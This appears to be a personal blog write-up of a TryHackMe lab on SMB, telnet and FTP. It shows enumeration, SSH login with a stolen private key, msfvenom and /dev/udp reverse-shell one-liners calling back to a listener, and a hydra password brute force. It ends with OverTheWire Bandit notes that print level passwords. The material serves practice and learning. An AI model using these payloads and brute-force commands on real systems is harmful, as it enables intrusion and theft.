============================================= | Nbtstat Information for 10.10.197.190 | ============================================= Looking up status of 10.10.197.190 POLOSMB <00> - B <ACTIVE> Workstation Service POLOSMB <03> - B <ACTIVE> Messenger Service POLOSMB <20> - B <ACTIVE> File Server Service ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name WORKGROUP <1d> - B <ACTIVE> Master Browser WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
====================================== | Session Check on 10.10.197.190 | ====================================== [+] Server 10.10.197.190 allows sessions using username '', password ''
============================================ | Getting domain SID for 10.10.197.190 | ============================================ Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup
======================================= | OS information on 10.10.197.190 | ======================================= Use of uninitialized value $os_info in concatenation (.) or string at /root/Desktop/Tools/Miscellaneous/enum4linux.pl line 464. [+] Got OS info for 10.10.197.190 from smbclient: [+] Got OS info for 10.10.197.190 from srvinfo: POLOSMB Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu) platform_id : 500 os version : 6.1 server type : 0x809a03
========================================== | Share Enumeration on 10.10.197.190 | ========================================== WARNING: The "syslog" option is deprecated
Sharename Type Comment --------- ---- ------- netlogon Disk Network Logon Service profiles Disk Users profiles print$ Disk Printer Drivers IPC$ IPC IPC Service (polosmb server (Samba, Ubuntu)) Reconnecting with SMB1 for workgroup listing.
Server Comment --------- -------
Workgroup Master --------- ------- WORKGROUP POLOSMB [+] Attempting to map shares on 10.10.197.190 //10.10.197.190/netlogon [E] Can't understand response: WARNING: The "syslog" option is deprecated tree connect failed: NT_STATUS_BAD_NETWORK_NAME //10.10.197.190/profiles Mapping: OK, Listing: OK //10.10.197.190/print$ Mapping: DENIED, Listing: N/A //10.10.197.190/IPC$ [E] Can't understand response: WARNING: The "syslog" option is deprecated NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
======================================================================== | Users on 10.10.197.190 via RID cycling (RIDS: 500-550,1000-1050) | ======================================================================== [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-21-434125608-3964652802-3194254534 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-32 and logon username '', password ''
What share sticks out as something we might want to investigate?
profiles
4. Exploiting SMB
What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?
smbclient //10.10.10.2/secret -U suit -p 445
Does the share allow anonymous access? Y/N?
smbclient //10.10.197.190/profiles -U Anonymous -p 445 Y
Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
here we cd into the tmp folder so we can pull some files down
smb: \> ls . D 0 Tue Apr 21 12:08:23 2020 .. D 0 Tue Apr 21 11:49:56 2020 .cache DH 0 Tue Apr 21 12:08:23 2020 .profile H 807 Tue Apr 21 12:08:23 2020 .sudo_as_admin_successful H 0 Tue Apr 21 12:08:23 2020 .bash_logout H 220 Tue Apr 21 12:08:23 2020 .viminfo H 947 Tue Apr 21 12:08:23 2020 Working From Home Information.txt N 358 Tue Apr 21 12:08:23 2020 .ssh DH 0 Tue Apr 21 12:08:23 2020 .bashrc H 3771 Tue Apr 21 12:08:23 2020 .gnupg DH 0 Tue Apr 21 12:08:23 2020
12316808 blocks of size 1024. 7583720 blocks available
Working from home is of interest
trying to use smb: \> get Working From Home Information.txt NT_STATUS_OBJECT_NAME_NOT_FOUND opening remote file \Working
fails to get us a file, we need to correctly address spaces in this terminal the default \ does not work, but other options remain
it seems double quotations is the best option smb: \> get "Working From Home Information.txt" getting file \Working From Home Information.txt of size 358 as Working From Home Information.txt (116.5 KiloBytes/sec) (average 116.5 KiloBytes/sec)
the file that was pulled down is now named 'Working From Home Information.txt'
and holds the following information root@ip-10-10-73-253:/tmp# cat Working\ From\ Home\ Information.txt John Cactus,
As you're well aware, due to the current pandemic most of POLO inc. has insisted that, wherever possible, employees should work from home. As such- your account has now been enabled with ssh access to the main server.
If there are any problems, please contact the IT department at it@polointernalcoms.uk
Regards,
James Department Manager
this profile folder likely belongs to John Cactus
What service has been configured to allow him to work from home?
ssh
Okay! Now we know this, what directory on the share should we look in?
.ssh
This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
id_rsa this is the private key that can be use for ssh authentication
Download this file to your local machine, and change the permissions to "600" using "chmod 600 [file]". Now, use the information you have already gathered to work out the username of the account. Then, use the service and key to log-in to the server. What is the smb.txt flag?
there are multiple ways to discover the account username,
1. recalling the enum4linux results that contained S-1-22-1-1000 Unix User\cactus (Local User)
2. which i used. download the id_rsa.pub file, these usually include more information in this case the file has the following ending cactus@polosmb
the following ssh command gets you into the server as a user ssh -i id_rsa cactus@10.10.197.190 at this point you can cat the flag
5. Understanding Telnet
What is Telnet?
an application protocol
What has slowly replaced Telnet?
ssh
How to connect to a Telnet Server with IP 10.10.10.3 on port 23?
telnet 10.10.10.3 23
The lack of what, means that all Telnet communication is in plaintext?
encryption
6. Enumerating Telnet
How many ports are open on the target machine?
nmap 10.10.234.233
results in no open ports, i need to figure out how to look at more ports.
nmap -p 1-10000 10.10.234.233
trying to look at more ports displays one open port
Starting Nmap 7.60 ( https://nmap.org ) at 2022-09-19 04:42 BST Nmap scan report for ip-10-10-113-139.eu-west-1.compute.internal (10.10.113.139) Host is up (0.00076s latency). Not shown: 9999 closed ports PORT STATE SERVICE 8012/tcp open unknown MAC Address: 02:BD:A8:4A:74:A5 (Unknown)
What port is this?
8012
This port is unassigned, but still lists the protocol it's using, what protocol is this?
tcp
Now re-run the nmap scan, without the -p- tag, how many ports show up as open?
running without -p- or scanning only default nmap range would result in this port not being found.
thanks to the way this question is worded i reran the nmap scan to see what the results become and get a better idea of what the following statement means.
trying to understand what this mean, i looked up and found the following:
To scan all ports (1 – 65535):nmap –p– 192.168.0.1
in: https://phoenixnap.com/kb/nmap-scan-open-ports This -p- is obviously more likely to find open ports, but it takes much longer. the 1-10000 took 5:34 while the -p- seems to be on route for 45m. useful during an actual attack, not something i plan on doing to much during labs. extra slow due to stealth scan capabilities.
Here, we see that by assigning telnet to a non-standard port, it is not part of the common ports list, or top 1000 ports, that nmap scans. It's important to try every angle when enumerating, as the information you gather here will inform your exploitation stage.
Based on the title returned to us, what do we think this port could be used for?
a backdoor
what does this mean? how do i get a title? what does * ******* mean? im going to try enum4linux on it and see how that goes. since i need a title, and something to enumerate possible processes happening in the port. i got nothing useful.
i ended up googling for port 8012, and found https://kb.eventtracker.com/evtpass/evtPages/PortNo_8012_PTAKKS_59256.asp it mentions PTAKKS a backdoor that uses tcp 8012
with a little more google i found the following, i was trying to figure out how to check for services running on open ports, and knew there was a way but forgot how. https://subscription.packtpub.com/book/networking-&-servers/9781784392918/2/ch02lvl1sec18/scanning-and-identifying-services-with-nmap here they mention
nmap -p 8012 -sV -O 10.10.113.139
we modify with appropriate ip and we try again later, since my 2 hours on the machine ran out.
the result is
PORT STATE SERVICE VERSION 8012/tcp open unknown 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port8012-TCP:V=7.60%I=7%D=9/20%Time=632912DF%P=x86_64-pc-linux-gnu%r(NU SF:LL,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20command SF:s\n")%r(GenericLines,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\ SF:x20view\x20commands\n")% ....
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.1 (94%), Linux 3.2 (94%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.8 (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.8 (92%)
now with much better information thanks to the -sV we can see that the a backdoor was a pretty simple answer.
Who could it belong to? Gathering possible usernames is an important step in enumeration.
SKIDY this was deduced from the line "SKIDY'S\x20BACKDOOR"
7. Exploiting Telnet
Okay, let's try and connect to this telnet port! If you get stuck, have a look at the syntax for connecting outlined above.
telnet 10.10.211.129 8012
root@ip-10-10-10-29:~# telnet 10.10.211.129 8012 Trying 10.10.211.129... Connected to 10.10.211.129. Escape character is '^]'. SKIDY'S BACKDOOR. Type .HELP to view commands
Great! It's an open telnet connection! What welcome message do we receive?
SKIDY'S BACKDOOR.
Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)
N as of right now i have not successfully gotten an input outside of .HELP
which results in .HELP .HELP: View commands .RUN <command>: Execute commands .EXIT: Exit
now .RUN doesn't show any results we might be able to believe that they are being run elsewhere, but ill move forward in the lab.
Hmm... that's strange. Let's check to see if what we're typing is being executed as a system command.
run: sudo tcpdump ip proto \\icmp -i eth0
This starts a tcpdump listener, specifically listening for ICMP traffic, which pings operate on.
Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
your local ip is seen in the root@ip-10-10-10-29: i messed up here and just ran ping ip
when you dont have computer access, this might lock you out of the terminal for good, on top of being super noisy. good thing for this lab i can turn of and turn on the victim box, which at least on my side gets rid of the issue. i dont know exactly how tryhackme shuts down unused systems. is it a vm that gets reset or saved at some point? these are questions i will likely never know the answer to. granted since the ping stopped im fairly confident the machine turned off.
I highly recommend writing the command separately and pasting it in i managed to lock myself out of the telnet twice. i kept getting exited after typing in the ip.
msfvenom -p cmd/unix/reverse_netcat lhost=10.10.10.29 lport=4444 R
i know theres a couple different ways to do reverse shells, my favorite being trough the /dev/udp as shown in https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md Victim:sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 4242
I did not know that msfvenom existed, but a tool that builds payloads according to different parameters is beautiful. [-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload [-] No arch selected, selecting arch: cmd from the payload No encoder specified, outputting raw payload Payload size: 90 bytes mkfifo /tmp/nvti; nc 10.10.10.29 4444 0</tmp/nvti | /bin/sh >/tmp/nvti 2>&1; rm /tmp/nvti
What word does the generated payload start with?
mkfifo
Perfect. We're nearly there. Now all we need to do is start a netcat listener on our local machine. We do this using:
"nc -lvp [listening port]"
What would the command look like for the listening port we selected in our payload?
nc -lvp 4444
Great! Now that's running, we need to copy and paste our msfvenom payload into the telnet session and run it as a command. Hopefully- this will give us a shell on the target machine!
Success! What is the contents of flag.txt?
at this point you can cat the flag.txt and be done with task 7
8. Understanding FTP
What communications model does FTP use?
client-server
What's the standard FTP port?
a quick google search finds port 21
How many modes of FTP connection are there?
2 active and passive
9. Enumerating FTP
Run an nmap scan of your choice. How many ports are open on the target machine?
nmap -p 1-10000 10.10.168.84
first result allows us to move forward Not shown: 9999 closed ports PORT STATE SERVICE 21/tcp open ftp
i ran one with only the first 1-10000 ports and only found one port. now im running something faster
nmap -p- -sS 10.10.168.84
changed it again due to slow scan, obviously not recommended outside of laboratory scenarios
nmap -p- -T 5 10.10.168.84
Not shown: 65533 closed ports PORT STATE SERVICE 21/tcp open ftp 80/tcp open http MAC Address: 02:42:E7:21:CB:93 (Unknown)
Wow, i just waited for a full scan because the first one missed port 80. oh man. 2
What port is ftp running on?
21
What variant of FTP is running on it?
using the previous nmap command that enumerates services we will hopefully be able to find the ftp variant
nmap -p 21 -sV -O 10.10.168.84
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.0.8 or later MAC Address: 02:42:E7:21:CB:93 (Unknown) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Linux 3.13 (96%), Linux 3.8 (96%), ASUS RT-N56U WAP (Linux 3.4) (94%), Linux 3.16 (94%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 (92%), Linux 3.19 (92%), Linux 3.2 - 4.8 (92%), Linux 3.4 - 3.10 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 1 hop Service Info: Host: Welcome
vsftpd 2.0.8 or later
Great, now we know what type of FTP server we're dealing with we can check to see if we are able to login anonymously to the FTP server. We can do this using by typing "ftp [IP]" into the console, and entering "anonymous", and no password when prompted. What is the name of the file in the anonymous FTP directory?
for this part we likely want to pull the information down to do this we use the get command, i also moved to the tmp folder
root@ip-10-10-10-29:~# cd /tmp/ root@ip-10-10-10-29:/tmp# ftp 10.10.168.84 Connected to 10.10.168.84. 220 Welcome to the administrator FTP service. Name (10.10.168.84:root): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> get PUBLIC_NOTICE.txt local: PUBLIC_NOTICE.txt remote: PUBLIC_NOTICE.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for PUBLIC_NOTICE.txt (353 bytes). 226 Transfer complete. 353 bytes received in 0.00 secs (202.6611 kB/s)
=================================== MESSAGE FROM SYSTEM ADMINISTRATORS ===================================
Hello,
I hope everyone is aware that the FTP server will not be available over the weekend- we will be carrying out routine system maintenance. Backups will be made to my account so I reccomend encrypting any sensitive data.
Cheers,
Mike
Great! Now we've got details about the FTP server and, crucially, a possible username. Let's see what we can do with that...
using the CVE mentioned we can do the following
https://www.exploit-db.com/exploits/20745
oot@ip-10-10-10-29:/tmp# nc 10.10.168.84 21 220 Welcome to the administrator FTP service. cwd ~mike 530 Please login with USER and PASS.
verify that mike account exists
root@ip-10-10-10-29:/tmp# ftp 10.10.168.84 Connected to 10.10.168.84. 220 Welcome to the administrator FTP service. Name (10.10.168.84:root): mike 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 0 0 4096 Apr 24 2020 ftp -rwxrwxrwx 1 0 0 26 Apr 24 2020 ftp.txt 226 Directory send OK. ftp> get ftp.txt local: ftp.txt remote: ftp.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for ftp.txt (26 bytes). 226 Transfer complete.
in this scenario i just guessed a password and was correct at which point i was able to read the flag at ftp.txt and solve all of 10. i will still follow through and document that task
10. Exploiting FTP
What is the password for the user "mike"?
hydra -t 4 -l mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.168.84 ftp
[21][ftp] host: 10.10.168.84 login: mike password: ******** [STATUS] attack finished for 10.10.168.84 (waiting for children to complete tests)
Bingo! Now, let's connect to the FTP server as this user using "ftp [IP]" and entering the credentials when prompted
Name (10.10.168.84:root): mike 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. drwxrwxrwx 2 0 0 4096 Apr 24 2020 ftp -rwxrwxrwx 1 0 0 26 Apr 24 2020 ftp.txt 226 Directory send OK. ftp> get ftp.txt local: ftp.txt remote: ftp.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for ftp.txt (26 bytes). 226 Transfer complete.
What is ftp.txt?
cat ftp.txt
Writeups should have a link to TryHackMe and not include any passwords/cracked hashes/flags https://tryhackme.com/room/networkservicesFreorererererere
Rules Ive Used # This file intentionally does not come with signatures. Put your local # additions here. # alert icmp any any <> any any (msg: "IP ID 35369 Found"; id:35369; sid: 1000001; rev:1) # log tcp any any <> any any (msg: "ALL SYN FLAGS"; flags:S; sid: 1000001; rev:1;) # log tcp any any <> any any (msg: "ALL SYN FLAGS"; flags:P,A; sid: 1000001; rev:1;) # log ip any any <> any any (msg: "SAME-IP IN IP"; sameip; sid:1000001; rev:1;)#This was not used in the first snort, they only wanted the next 2 rules, which showed less dups log udp any any <> any any (msg: "SAME-IP IN TCP"; sameip; sid:1000001; rev:1;) log tcp any any <> any any (msg: "SAME-IP IN UDP"; sameip; sid:1000002; rev:1;) Snort Params: Some Sniffer mode parameters are explained in the table below; Parameter Description -v Verbose. Display the TCP/IP output in the console. -d Display the packet data (payload). -e Display
Lessons Learned using nc to create a steady connection, also on background and foreground processes Logging in On a kali vm/ linux machine Type: ssh bandit20@bandit.labs.overthewire.org -p 2220 GbKksEFF4yrVs6il55v6gwY5aVje5f0j Completing The Challenge The Goal: There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21). The Solution: bandit20@bandit:~$ nc -l -p 2000 ^Z [1]+ Stopped nc -l -p 2000 bandit20@bandit:~$ ./suconnect 2000 ^Z [2]+ Stopped ./suconnect 2000 bandit20@bandit:~$ fg 1 nc -l -p 2000 GbKksEFF4yrVs6il55v6gwY5aVje5f0j ^Z [1]+ Stopped nc -l -p 2000 bandit20@bandit:~$ fg 2 ./suconnect 2000 Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Lessons Learned using cyberchef for things like rot13 Logging in On a kali vm/ linux machine Type: ssh bandit11@bandit.labs.overthewire.org -p 2220 IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR Completing The Challenge The Goal: The password for the next level is stored in the file data.txt , where all lowercase (a-z) and uppercase (A-Z) letters have been rotated by 13 positions The Solution: bandit11@bandit:~$ cat data.txt Gur cnffjbeq vf 5Gr8L4qetPEsPk8htqjhRK8XSP6x2RHh The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu This is known as rot13 and many free websites exist to solve this issue. CyberChef is a very good site/tool for this and can be downloaded
Comments
Post a Comment